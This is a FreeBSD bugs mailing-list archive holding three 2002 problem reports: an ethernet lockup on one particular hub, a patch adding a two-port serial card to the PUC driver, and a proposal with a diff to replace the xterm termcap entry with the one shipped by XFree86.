freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CD8F937B400 for ; Mon, 29 Jul 2002 19:30:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2F98043E6A for ; Mon, 29 Jul 2002 19:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6U2U1JU060524 for ; Mon, 29 Jul 2002 19:30:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6U2U1VO060523; Mon, 29 Jul 2002 19:30:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 12FEF37B401 for ; Mon, 29 Jul 2002 19:25:17 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id C70E543E65 for ; Mon, 29 Jul 2002 19:25:16 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g6U2PGOT027075 for ; Mon, 29 Jul 2002 19:25:16 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g6U2PGnw027074; Mon, 29 Jul 2002 19:25:16 -0700 (PDT) Message-Id: <200207300225.g6U2PGnw027074@www.freebsd.org> Date: Mon, 29 Jul 2002 19:25:16 -0700 (PDT) From: Matt Crawford To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/41138: vr0 locks up on one hub, OK on another Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41138 >Category: i386 >Synopsis: vr0 locks up on one hub, OK on another >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jul 29 19:30:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Matt Crawford >Release: FreeBSD 4.6-RC #0 >Organization: >Environment: FreeBSD fireball.batavia.il.us 4.6-RC FreeBSD 4.6-RC #0: Thu Jun 13 22:07:25 CDT 2002 root@fireball.batavia.il.us:/usr/obj/usr/src/sys/FIREBALL i386 Jun 14 20:08:40 fireball /kernel: vr0: port 0xe800-0xe8ff mem 0xe9001000-0xe90010ff irq 10 at device 18.0 on pci0 Jun 14 20:08:40 fireball /kernel: vr0: Ethernet address: 00:50:2c:02:53:38 Jun 14 20:08:40 fireball /kernel: miibus0: on vr0 Jun 14 20:08:40 fireball /kernel: ukphy0: on miibus0 Jun 14 20:08:40 fireball /kernel: ukphy0: 10baseT, 10baseT-FDX, 100baseTX, 100baseTX-FDX, auto if_vr.c is 1.26.2.9 2002/05/20. >Description: Ethernet was working for months on a 10b2-to-10bT media converter. (Building backbone is 10b2.) I switched to an ACSYS 8-port hub and vr0 is at first lossy (20% ping loss to another machine on the LAN), then locks up within 15-30 minutes, logging many three-line sequences: Jul 28 14:40:07 fireball /kernel: vr0: watchdog timeout Jul 28 14:40:07 fireball /kernel: vr0: reset never completed! Jul 28 14:40:07 fireball /kernel: vr0: reset never completed! Putting a second, different model hub between this system and the ACSYS completely clears the problem. A completely different system on the same ACSYS hub has no problem. Ethernet in "autoselect" mode correctly selects 10baseT/UTP. I don't know how to see the half/full duplex setting. ("ifconfig vr0 mediaopt half-duplex" gives "SIOCSIFMEDIA: Device not configured." >How-To-Repeat: Plug into ACSYS Microstack hub. >Fix: Use a different hub type? >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 21:12:13 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C567C37B408 for ; Mon, 29 Jul 2002 21:12:09 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 75F0D43F13 for ; Mon, 29 Jul 2002 21:11:32 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6U4ACJU076474 for ; Mon, 29 Jul 2002 21:10:12 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6U4ACdH076473; Mon, 29 Jul 2002 21:10:12 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2747637B400 for ; Mon, 29 Jul 2002 21:05:12 -0700 (PDT) Received: from egan.internet-inc.co.jp (egan.internet-inc.co.jp [210.196.149.242]) by mx1.FreeBSD.org (Postfix) with SMTP id 4958743E31 for ; Mon, 29 Jul 2002 20:59:48 -0700 (PDT) (envelope-from smatsui@internet-inc.co.jp) Received: (qmail 52118 invoked by uid 1001); 30 Jul 2002 04:00:03 -0000 Message-Id: <20020730040003.52117.qmail@egan.internet-inc.co.jp> Date: 30 Jul 2002 04:00:03 -0000 From: Shinsuke Matsui Reply-To: Shinsuke Matsui To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/41142: patch: add 2 port serial card to PUC driver Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41142 >Category: kern >Synopsis: patch: add 2 port serial card to PUC driver >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Jul 29 21:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Shinsuke Matsui >Release: FreeBSD 4.6-RELEASE-p2 i386 >Organization: InterNet Inc. >Environment: System: FreeBSD kurobe.teletubbies.internet-inc.co.jp 4.6-RELEASE-p2 FreeBSD 4.6-RELEASE-p2 #0: Mon Jul 22 15:00:56 JST 2002 smatsui@po.teletubbies.internet-inc.co.jp:/usr/obj/usr/src/sys/KUROBE i386 >Description: Add an entry for VScom PCI-200L 2 port serial card to pucdata.c file. This entry is taken from OpenBSD. Patch is relative to current, but can be also applied to stable. >How-To-Repeat: >Fix: *** pucdata.c.orig Tue Jul 30 12:16:00 2002 --- pucdata.c Tue Jul 30 12:19:50 2002 *************** *** 623,628 **** --- 623,638 ---- }, }, + /* VScom PCI-200L: 2S */ + { "VScom PCI-200L", + { 0x14d2, 0x8020, 0, 0 }, + { 0xffff, 0xffff, 0, 0 }, + { + { PUC_PORT_TYPE_COM, 0x14, 0x00, COM_FREQ * 8}, + { PUC_PORT_TYPE_COM, 0x18, 0x00, COM_FREQ * 8}, + }, + }, + /* VScom PCI-400: 4S */ { "VScom PCI-400", { 0x10b5, 0x1077, 0x10b5, 0x1077 }, >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 21:40:27 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5A6E537B400 for ; Mon, 29 Jul 2002 21:40:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6C18943E3B for ; Mon, 29 Jul 2002 21:40:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6U4e2JU079199 for ; Mon, 29 Jul 2002 21:40:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6U4e2BN079198; Mon, 29 Jul 2002 21:40:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5681D37B400 for ; Mon, 29 Jul 2002 21:30:31 -0700 (PDT) Received: from CRWdog.demon.co.uk (p69-199.acedsl.com [66.114.69.199]) by mx1.FreeBSD.org (Postfix) with ESMTP id C9F4143E65 for ; Mon, 29 Jul 2002 21:30:29 -0700 (PDT) (envelope-from andy@CRWdog.demon.co.uk) Received: by CRWdog.demon.co.uk (Postfix, from userid 1001) id 16E3C181; Tue, 30 Jul 2002 00:30:27 -0400 (EDT) Message-Id: <20020730043027.16E3C181@CRWdog.demon.co.uk> Date: Tue, 30 Jul 2002 00:30:27 -0400 (EDT) From: Andy Sparrow Reply-To: Andy Sparrow To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/41143: termcap entry incorrect for XFree86 xterm as shipped in FreeBSD Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41143 >Category: bin >Synopsis: termcap entry incorrect for XFree86 xterm as shipped in FreeBSD >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Jul 29 21:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Andy Sparrow >Release: FreeBSD 4.6-STABLE i386 >Organization: Not much >Environment: System: FreeBSD tureg.geek4food.org 4.6-STABLE FreeBSD 4.6-STABLE #95: Mon Jul 29 22:51:33 EDT 2002 root@tureg.geek4food.org:/usr/src/sys/compile/tureg i386 >Description: FreeBSD doesn't ship a termcap that is compatible with the color Xterm shipped by XFree86, certainly not as of XFree86-4.2 (and probably not ever). Previous methods used to obtain color in xterm, such as: i) Modifying the XTerm app defaults file to switch on the color attributes ii) Adding *customization: -color to your .Xdefaults file no longer work (and haven't since some time in 2001, IIRC). Setting TERM=xterm-color provides what appears to be functional color, but this totally breaks transparent inter-operability with other OS'es that may or may not have a terminal type 'xterm-color' available (and generally don't, e.g. Solaris and other major Unix-like OS'es). Worse, some OS'es may actually ship with /another/, incompatible, terminal type defined as 'xterm-color', for an obsolete terminal emulator. This situation is quite clearly documented by Thomas E. Dickey (the current maintainer of 'xterm' for the XFree86 consortium) on his web page: http://dickey.his.com/xterm/xterm.faq.html Note particularly his critique of the current method used in FreeBSD and the things that are done incorrectly here: http://dickey.his.com/xterm/xterm.faq.html#xterm_terminfo and his advice to use the termcap shipped with XFree86 for the XFree86 'xterm'. On this topic in <200007190145.SAA20697@mass.osd.bsdi.com>, Mike Smith said: | We've generally maintained that we should ship whatever the XFree86 | people send us. What's their take on this? >How-To-Repeat: Try to use anything that outputs color, e.g. 'ls', 'mutt', 'lynx', 'sysinstall' etc. in an 'xterm' without setting TERM=xterm-color. It doesn't work. Now set TERM=xterm-color and try to log into any system other than a FreeBSD one. >Fix: This diff replaces the FreeBSD xterm termcap entry with the one shipped with the XFree86-4 distribution (e.g. /usr/ports/x11/XFree86-4-clients/work/xc/programs/xterm/termcap). It could probably use some cleaning of the test entries, although the errors from 'cap_mkdb' appear to be entirely benign: --- /usr/share/misc/termcap Mon Jul 29 23:39:18 2002 +++ /usr/share/misc/termcap.orig Mon Jul 29 23:20:48 2002 @@ -298,6 +298,16 @@ :se=\EG0:so=\EG1:up=^K:us=\EG1:ue=\EG0: adm3|3|lsi adm3:\ :do=^J:am:le=^H:bs:cl=^Z:li#24:ma=^K^P:co#80: +xterm|vs100|xterm terminal emulator (X window system):\ + :li#24:\ + :kh=\EOH:@7=\EOF:kb=^H:kD=^?:\ + :k1=\EOP:k2=\EOQ:k3=\EOR:k4=\EOS:km:\ + :is=\E>\E[?1;3;4;5l\E[?7;8h\E[1;65r\E[65;1H:\ + :rs=\E>\E[?1;3;4;5l\E[?7;8h:\ + :tc=vt220: +xterms|vs100s|xterm terminal emulator (small)(X window system):\ + :is=\E>\E[?1;3;4;5l\E[?7;8h\E[1;24r\E[24;1H:\ + :li#24:tc=xterm: # # DESCRIPTION: # This file describes capabilities of various terminals, as needed by @@ -2812,194 +2822,65 @@ :ac=``aaffggjjkkllmmnnooppqqrrssttuuvvwwxxyyzz{{||}}~~..--++,,hhii00: SW|screen-w|VT 100/ANSI X3.64 virtual terminal with 132 cols:\ :co#132:tc=screen: -# $Xorg: termcap,v 1.3 2000/08/17 19:55:10 cpqbld Exp $ -# -# Note: -# termcap format is limited to 1023 characters. This set of descriptions -# is a subset of the terminfo, since not all features can be fit into -# that limit. The 'xterm' description supports color. The monochrome -# 'xtermm' drops color in favor of additional function keys. If you need -# both, use terminfo. -# -# The 1023-character limit applies to each entry after resolving the -# "tc=" strings. Some implementations may discount all or part of the -# formatting characters in the entry (i.e., the backslash newline tab -# colon). GNU termcap does not have this limit. -# -# I checked the limits using ncurses "captoinfo -CrTv", which prints -# the resolved length of each entry in a comment at the end - T.Dickey -# -# $XFree86: xc/programs/xterm/termcap,v 3.28 2001/01/17 23:46:39 dawes Exp $ -# -xf|xterm-xfree86|XFree86 xterm:\ - :k1=\EOP:k2=\EOQ:k3=\EOR:k4=\EOS:\ - :k5=\E[15~:k6=\E[17~:k7=\E[18~:k8=\E[19~:\ - :k9=\E[20~:k;=\E[21~:F1=\E[23~:F2=\E[24~:\ - :kH=\EOF:@7=\EOF:kI=\E[2~:\ - :kh=\EOH:*6=\EOF:kP=\E[5~:kN=\E[6~:\ - :ku=\EOA:kd=\EOB:kr=\EOC:kl=\EOD:Km=\E[M:tc=xterm-basic: -# -# This chunk is used for building the VT220/Sun/PC keyboard variants. -xb|xterm-basic|xterm common (XFree86):\ - :li#24:co#80:am:kn#12:km:mi:ms:xn:bl=^G:\ - :is=\E[!p\E[?3;4l\E[4l\E>:rs=\E[!p\E[?3;4l\E[4l\E>:\ - :AL=\E[%dL:DL=\E[%dM:DC=\E[%dP:al=\E[L:dc=\E[P:dl=\E[M:\ - :UP=\E[%dA:DO=\E[%dB:LE=\E[%dD:RI=\E[%dC:\ - :ho=\E[H:cd=\E[J:ce=\E[K:cl=\E[H\E[2J:cm=\E[%i%d;%dH:cs=\E[%i%d;%dr:\ - :im=\E[4h:ei=\E[4l:ks=\E[?1h\E=:ke=\E[?1l\E>:kD=\E[3~:kb=^H:\ - :sf=\n:sr=\EM:st=\EH:ct=\E[3g:sc=\E7:rc=\E8:\ - :eA=\E(B\E)0:as=^N:ae=^O:ml=\El:mu=\Em:up=\E[A:nd=\E[C:\ - :md=\E[1m:me=\E[m^O:mr=\E[7m:so=\E[7m:se=\E[27m:us=\E[4m:ue=\E[24m:\ - :ti=\E[?1049h:te=\E[?1049l:vi=\E[?25l:ve=\E[?25h:\ - :ut:Co#8:pa#64:op=\E[39;49m:AB=\E[4%dm:AF=\E[3%dm:\ - -# The xterm-xfree86 description has all of the features, but is not completely -# compatible with vt220. If you are using a Sun or PC keyboard, set the -# sunKeyboard resource to true: -# + maps the editing keypad -# + interprets control-function-key as a second array of keys, so a -# 12-fkey keyboard can support vt220's 20-fkeys. -# + maps numeric keypad "+" to ",". -# + uses DEC-style control sequences for the application keypad. -# -vt|xterm-vt220|xterm emulating vt220:\ - :kH=\E[4~::@7=\E[4~:*6=\E[4~:kh=\E[1~:Km=\E[M:tc=xterm-basic: - -v1|xterm-24|xterms|vs100|24x80 xterm:\ - :li#24:\ - :tc=xterm: -v2|xterm-65|65x80 xterm:\ - :li#65:tc=xterm: -vb|xterm-bold|xterm with bold for underline:\ - :so=\E[7m:us=\E[1m:tc=xterm: -vb|xterm-boldso|xterm with bold for standout:\ - :se=\E[m:so=\E[1m:tc=xterm: -vm|xterm-mono|monochrome xterm:\ - :kn#20:\ - :st@:ut@:Co@:NC@:op@:AB@:AF@:pa@:Sf@:Sb@:tc=xterm: -# -# Alternate terminal description that "works" for interactive shells such as -# tcsh and bash. -xn|xterm-noapp|xterm with cursor keys in normal mode:\ - kl=\E[D:kd=\E[B:kr=\E[C:ku=\E[A:ks=\E=:ke=\E>:ti@:te@:tc=xterm: -# -# This should work for the commonly used "color xterm" variations (XFree86 -# xterm, color_xterm, nxterm, rxvt). Note that it does not set 'bce', so for -# XFree86 and and rxvt, some applications that use colors will be less -# efficient, and in a few special cases (with "smart" optimization) the wrong -# color will be painted in spots. -vc|xterm-color|generic "ANSI" color xterm:\ - :Co#8:NC@:pa#64:op=\E[m:AB=\E[4%dm:AF=\E[3%dm:ac@:tc=xterm-r6: -# -# These aliases are for compatibility with the terminfo; termcap cannot provide -# the extra features, but termcap applications still want the names. -x1|xterm-16color|xterm alias:tc=xterm-xfree86: -x2|xterm-88color|xterm alias:tc=xterm-256color: -x3|xterm-256color|xterm alias:tc=xterm-xfree86: -xn|xterm-nrc|xterm alias:tc=xterm: -xr|xterm-rep|xterm alias:tc=xterm: -xx|xterm-xmc|xterm alias:sg#1:tc=xterm: -# -# An 8-bit description is doable with termcap, but there are probably no -# termcap (or BSD curses) applications that are able to use it. -x8|xterm-8bit|xterm terminal emulator 8-bit controls (X Window System):\ - :co#80:li#24:\ - :it#8:am:km:mi:ms:xn:\ - :AL=\233%dL:DC=\233%dP:DL=\233%dM:DO=\233%dB:IC=\233%d@:LE=\233%dD:\ - :RI=\233%dC:UP=\233%dA:ae=^O:al=\233L:as=^N:bl=^G:bt=\233Z:\ - :cd=\233J:ce=\233K:cl=\233H\2332J:cm=\233%i%d;%dH:cr=^M:\ - :cs=\233%i%d;%dr:ct=\2333g:dc=\233P:dl=\233M:do=^J:up=\233A:nd=\233C:\ - :ei=\2334l:ho=\233H:im=\2334h:\ - :is=\E[62"p\E G\233m\233?7h\E>\E7\233?1;3;4;6l\2334l\233r\E8:\ - :k1=\23311~:k2=\23312~:k3=\23313~:k4=\23314~:k5=\23315~:\ - :k6=\23317~:k7=\23318~:k8=\23319~:k9=\23320~:kD=\2333~:\ - :kI=\2332~:kN=\2336~:kP=\2335~:kb=^H:kd=\217B:\ - :ke=\233?1l\E>:kh=\2331~:kl=\217D:kr=\217C:ks=\233?1h\E=:\ - :ku=\217A:le=^H:mb=\2335m:md=\2331m:me=\233m^O:mr=\2337m:\ - :rc=\E8:sc=\E7:se=\23327m:sf=^J:so=\2337m:sr=\215:\ - :st=\210:ta=^I:te=\233?1049l:ti=\233?1049h:ue=\23324m:us=\2334m:\ - :vb=\233?5h\233?5l:ve=\233?25h:vi=\233?25l:Km=\233M: -# -hp|xterm-hp|XFree86 xterm with hpterm function keys:\ - :k1=\Ep:k2=\Eq:k3=\Er:k4=\Es:k5=\Et:k6=\Eu:k7=\Ev:k8=\Ew:\ - :kC=\EJ:kD=\EP:@7=\EF:kI=\EQ:kN=\ES:kP=\ET:kh=\Eh:\ - :kd=\EB:kl=\ED:kr=\EC:ku=\EA:tc=xterm-basic: -# -xS|xterm-sco|XFree86 xterm with SCO function keys:\ - :kl=\E[D:kd=\E[B:kr=\E[C:ku=\E[A:@7=\E[F:\ - :k1=\E[M:k2=\E[N:k3=\E[O:k4=\E[P:k5=\E[Q:\ - :k6=\E[R:k7=\E[S:k8=\E[T:k9=\E[U:k;=\E[V:\ - :F1=\E[W:F2=\E[X:F3=\E[Y:F5=\E[a:F6=\E[b:\ - :F7=\E[c:F8=\E[d:F9=\E[e:FA=\E[f:FB=\E[g:\ - :FC=\E[h:FD=\E[i:FE=\E[j:FF=\E[k:\ - :kh=\E[H:kI=\E[L:kN=\E[G:kP=\E[I:ac@:tc=xterm-basic: -# -v5|xterm-vt52|xterm emulating vt52:\ - :bs:\ +xterm-r5|xterm X11R5 version:\ + :am:km:ms:xn:\ :co#80:it#8:li#24:\ - :ae=\EG:as=\EF:bl=^G:cd=\EJ:ce=\EK:cl=\EH\EJ:cm=\EY%+ %+ :\ - :cr=^M:do=\EB:ho=\EH:kb=^H:kd=\EB:kl=\ED:kr=\EC:ku=\EA:\ - :le=\ED:nd=\EC:nw=^M^J:sf=^J:sr=\EI:ta=^I:up=\EA: -# -xs|xterm-sun|xterm with Sun functionkeys:\ - :k1=\E[224z:k2=\E[225z:k3=\E[226z:k4=\E[227z:\ - :k5=\E[228z:k6=\E[229z:k7=\E[230z:k8=\E[231z:\ - :k9=\E[232z:k;=\E[233z:F1=\E[192z:F2=\E[193z:\ - :%1=\E[196z:&8=\E[195z:@0=\E[200z:kI=\E[2z:\ - :kN=\E[222z:kP=\E[216z:kh=\E[214z:kD=^?:\ - :Km=\E[M:@5=\E[197z::@7=\E[220z:\ - :tc=xterm-basic: -# -# vi may work better with this entry, because vi doesn't use insert mode much. -# |xterm-ic|xterm-vi|xterm with insert character instead of insert mode:\ -vi|xterm-ic|xterm-vi|xterm with insert char:\ - :im@:ei@:mi@:ic=\E[@:IC=\E[%d@:tc=xterm: -# -# Compatible with the X11R6.3 xterm -r6|xterm-r6|xterm-old|X11R6 xterm:\ - :is=\E[m\E[?7h\E[4l\E>\E7\E[r\E[?1;3;4;6l\E8:\ - :rs=\E[m\E[?7h\E[4l\E>\E7\E[r\E[?1;3;4;6l\E8:\ - :AL=\E[%dL:DL=\E[%dM:DC=\E[%dP:DO=\E[%dB:UP=\E[%dA:\ - :LE=\E[%dD:RI=\E[%dC:al=\E[L:am:bl=^G:\ - :bs:cd=\E[J:ce=\E[K:cl=\E[H\E[2J:cm=\E[%i%d;%dH:co#80:\ - :cs=\E[%i%d;%dr:ct=\E[3g:dc=\E[P:dl=\E[M:ho=\E[H:\ - :im=\E[4h:ei=\E[4l:mi:ks=\E[?1h\E=:ke=\E[?1l\E>:@7=\E[4~:kh=\E[1~:\ + :AL=\E[%dL:DC=\E[%dP:DL=\E[%dM:DO=\E[%dB:F1=\E[23~:\ + :F2=\E[24~:IC=\E[%d@:LE=\E[%dD:RI=\E[%dC:UP=\E[%dA:\ + :al=\E[L:bl=^G:cd=\E[J:ce=\E[K:cl=\E[H\E[2J:\ + :cm=\E[%i%d;%dH:cr=^M:cs=\E[%i%d;%dr:ct=\E[3g:dc=\E[P:\ + :dl=\E[M:do=^J:ho=\E[H:ic=\E[@:k0=\EOq:k1=\E[11~:\ + :k2=\E[12~:k3=\E[13~:k4=\E[14~:k5=\E[15~:k6=\E[17~:\ + :k7=\E[18~:k8=\E[19~:k9=\E[20~:k;=\E[21~:kA=\E[30~:\ + :kD=\E[3~:kE=\E[8~:kI=\E[2~:kL=\E[31~:kN=\E[6~:kP=\E[5~:\ + :kb=^H:kd=\EOB:ke=\E[?1l\E>:kh=\E[7~:kl=\EOD:kr=\EOC:\ + :ks=\E[?1h\E=:ku=\EOA:le=^H:md=\E[1m:me=\E[m:mr=\E[7m:\ + :nd=\E[C:r1=\E>\E[1;3;4;5;6l\E[?7h\E[m\E[r\E[2J\E[H:\ + :rc=\E8:\ + :sc=\E7:se=\E[m:sf=^J:so=\E[7m:sr=\EM:st=\EH:ta=^I:up=\E[A: +xterm-r6|xterm-old|xterm X11R6 version:\ + :am:km:mi:ms:xn:\ + :co#80:it#8:li#24:\ + :*6=\E[4~:@0=\E[1~:AL=\E[%dL:DC=\E[%dP:DL=\E[%dM:\ + :DO=\E[%dB:F1=\E[23~:F2=\E[24~:F3=\E[25~:F4=\E[26~:\ + :F5=\E[28~:F6=\E[29~:F7=\E[31~:F8=\E[32~:F9=\E[33~:\ + :FA=\E[34~:LE=\E[%dD:RI=\E[%dC:UP=\E[%dA:ae=^O:al=\E[L:\ + :as=^N:bl=^G:cd=\E[J:ce=\E[K:cl=\E[H\E[2J:cm=\E[%i%d;%dH:\ + :cr=^M:cs=\E[%i%d;%dr:ct=\E[3g:dc=\E[P:dl=\E[M:do=^J:\ + :eA=\E)0:ho=\E[H:ic=\E[@:IC=\E[%d@:\ + :is=\E7\E[r\E[m\E[?7h\E[?1;3;4;6l\E[4l\E8\E>:k1=\EOP:\ + :k2=\EOQ:k3=\EOR:k4=\EOS:k5=\E[15~:k6=\E[17~:k7=\E[18~:\ + :k8=\E[19~:k9=\E[20~:k;=\E[21~:kD=\E[3~:kI=\E[2~:kN=\E[6~:\ + :kP=\E[5~:kb=^H:kd=\EOB:ke=\E[?1l\E>:kl=\EOD:kr=\EOC:\ + :ks=\E[?1h\E=:ku=\EOA:le=^H:md=\E[1m:me=\E[m:ml=\El:\ + :mr=\E[7m:mu=\Em:nd=\E[C:\ + :r2=\E7\E[r\E[m\E[?7h\E[?1;3;4;6l\E[4l\E8\E>:rc=\E8:\ + :sc=\E7:se=\E[m:sf=^J:so=\E[7m:sr=\EM:ta=^I:\ + :te=\E[2J\E[?47l\E8:ti=\E7\E[?47h:ue=\E[m:up=\E[A:\ + :us=\E[4m: +xterm-xf86-v32|xterm terminal emulator (X Window System):\ + :am:km:mi:ms:xn:\ + :co#80:it#8:li#24:\ + :AL=\E[%dL:DC=\E[%dP:DL=\E[%dM:DO=\E[%dB:IC=\E[%d@:\ + :K1=\EOw:K2=\EOy:K3=\EOu:K4=\EOq:K5=\EOs:LE=\E[%dD:\ + :RI=\E[%dC:UP=\E[%dA:ae=^O:al=\E[L:as=^N:bl=^G:cd=\E[J:\ + :ce=\E[K:cl=\E[H\E[2J:cm=\E[%i%d;%dH:cr=^M:\ + :cs=\E[%i%d;%dr:ct=\E[3g:dc=\E[P:dl=\E[M:do=^J:ec=\E[%dX:\ + :ho=\E[H:ic=\E[@:\ + :is=\E7\E[r\E[m\E[?7h\E[?1;3;4;6l\E[4l\E8\E>:\ :k1=\E[11~:k2=\E[12~:k3=\E[13~:k4=\E[14~:k5=\E[15~:\ - :k6=\E[17~:k7=\E[18~:k8=\E[19~:k9=\E[20~:k;=\E[21~:\ - :F1=\E[23~:F2=\E[24~:F3=\E[25~:F4=\E[26~:F5=\E[28~:\ - :F6=\E[29~:F7=\E[31~:F8=\E[32~:F9=\E[33~:FA=\E[34~:\ - :kn#20:km:@0=\E[1~:kI=\E[2~:kD=^?:*6=\E[4~:kP=\E[5~:kN=\E[6~:\ - :kb=^H:ku=\EOA:kd=\EOB:kr=\EOC:kl=\EOD:\ - :li#24:md=\E[1m:me=\E[m:mr=\E[7m:ms:nd=\E[C:pt:\ - :eA=\E)0:as=^N:ae=^O:ml=\El:mu=\Em:\ - :sc=\E7:rc=\E8:sf=\n:so=\E[7m:se=\E[m:sr=\EM:\ - :ti=\E7\E[?47h:te=\E[2J\E[?47l\E8:up=\E[A:us=\E[4m:ue=\E[m:xn: -# -# Compatible with the R5 xterm -r5|xterm-r5|X11R5 xterm X11R5:\ - :AL=\E[%dL:DC=\E[%dP:DL=\E[%dM:DO=\E[%dB:IC=\E[%d@:UP=\E[%dA:\ - :al=\E[L:am:\ - :bs:cd=\E[J:ce=\E[K:cl=\E[H\E[2J:cm=\E[%i%d;%dH:co#80:\ - :cs=\E[%i%d;%dr:ct=\E[3g:\ - :dc=\E[P:dl=\E[M:\ - :im=\E[4h:ei=\E[4l:mi:\ - :ho=\E[H:\ - :is=\E[r\E[m\E[2J\E[H\E[?7h\E[?1;3;4;6l\E[4l:\ - :rs=\E>\E[?1;3;4;5;6l\E[4l\E[?7h\E[m\E[r\E[2J\E[H:\ - :k1=\E[11~:k2=\E[12~:k3=\E[13~:k4=\E[14~:kb=^H:kd=\EOB:ke=\E[?1l\E>:\ - :kl=\EOD:km:kn#4:kr=\EOC:ks=\E[?1h\E=:ku=\EOA:\ - :@7=\E[4~:kh=\E[1~:\ - :li#24:md=\E[1m:me=\E[m:mr=\E[7m:ms:nd=\E[C:pt:\ - :sc=\E7:rc=\E8:sf=\n:so=\E[7m:se=\E[m:sr=\EM:\ - :te=\E[2J\E[?47l\E8:ti=\E7\E[?47h:\ - :up=\E[A:us=\E[4m:ue=\E[m:xn: -# -# This is the only entry which you should have to customize, since "xterm" -# is widely used for a variety of incompatible terminal emulations including -# color_xterm and rxvt. -v0|xterm|X11 terminal emulator:\ - :tc=xterm-xfree86: -# :tc=xterm-r6: + :k6=\E[17~:k7=\E[18~:k8=\E[19~:k9=\E[20~:kD=\177:kI=\E[2~:\ + :kN=\E[6~:kP=\E[5~:kb=^H:kd=\EOB:ke=\E[?1l\E>:kh=\EOH:\ + :kl=\EOD:kr=\EOC:ks=\E[?1h\E=:ku=\EOA:le=^H:md=\E[1m:\ + :me=\E[m\017:mr=\E[7m:nd=\E[C:rc=\E8:sc=\E7:se=\E[27m:\ + :sf=^J:so=\E[7m:sr=\EM:st=\EH:ta=^I:te=\E[2J\E[?47l\E8:\ + :ti=\E7\E[?47h:ue=\E[24m:up=\E[A:us=\E[4m:\ + :vb=\E[?5h\E[?5l:ve=\E[?25h:vi=\E[?25l:vs=\E[?25h:\ + :ac=``aaffggjjkkllmmnnooppqqrrssttuuvvwwxxyyzz{{||}}~~..--++\054\054ii00:\ + :u6=\E[%i%d;%dR:u7=\E[6n:u8=\E[?1;2c:u9=\E[c: +# @(#)termcap X10/6.6 11/7/86, minus alternate screen, plus :cs 